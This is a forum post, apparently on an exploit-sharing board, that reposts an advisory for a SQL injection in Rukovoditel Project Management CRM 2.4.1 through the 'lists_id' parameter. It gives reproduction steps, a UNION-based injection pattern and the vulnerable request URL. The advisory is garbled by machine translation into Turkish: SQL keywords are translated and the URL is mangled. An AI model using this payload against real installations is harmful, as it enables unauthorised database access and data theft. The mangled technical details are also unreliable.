Rukovoditel PRM-CRM 2.4.1 SQL Vuln.
by Adient - May 30, 2019 at 10:52 PM
#1
# Başlık Exploit: Rukovoditel Proje Yönetimi CRM 2.4.1 - 'lists_id' SQL Injection
# Dork N / A
# Tarih: 27-01-2019
# Exploit Author: Tolga KATIRCI
# Satıcı Web Sitesi: https://www.rukovoditel.net/
# Yazılım Bağlantı: https://sourceforge.net/projects/rukovoditel/
# Sürüm: 2.4.1
# Kategori: webapps
# Üzerinde test: Wampp @Win
# CVE N / A
# https://cxsecurity.com/issue/WLB-2019010289
# Yazılım Descr * iption: Rukovoditel ücretsiz bir web tabanlı açık kaynak proje yönetimi olduğunu 
uygulama. Geleneksel uygulamalardan çok farklı olarak Rukovoditel verir 
Kullanıcıların daha geniş ve kapsamlı bir yaklaşım proje yönetimine. Onun 
özelleştirme seçenekleri kullanıcılarının ek varlıkları oluşturmasına izin, değiştirmek 
ve aralarındaki ilişkiyi belirtmek ve gerekli oluşturmak 
raporlar. 

# güvenlik açıkları
# SQL enjeksiyon uygulanacak, kullanıcı giriş yapmanız gerekiyor.
Daha sonra küresel liste sekmesine Uygulama yapısı ekranından.
Yeni bir liste oluşturmak için yeni değer düğmesi ekleyin. Oluşturulan listeyi sql enjeksiyon uygulayabilirsiniz.
zayıflıkların resimler aşağıdadır.
https://i.hizliresim.com/nQJZm5.jpg
https://i.hizliresim.com/WqGmEQ.jpg

# POC - SQLI
# Parametreleri: lists_id = 1 (string)
# Saldırı Kalıbı: -1' + union + seçme + 1,2 - +
http: # İsteği GET // localhost / [PATH] /index.php?module=global_lists/choices lists_id = 1' [SQL]
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
Stimarine Xss vuln Adient 0 86 August 26, 2019 at 09:01 PM
Last Post: Adient
Karenderia CMS 5.3 - Multiple SQL Vuln. Adient 0 137 July 25, 2019 at 07:44 PM
Last Post: Adient
Newsbull Haber Script O.Redirect Vuln. Adient 0 115 July 17, 2019 at 04:36 PM
Last Post: Adient

 Users browsing this thread: 1 Guest(s)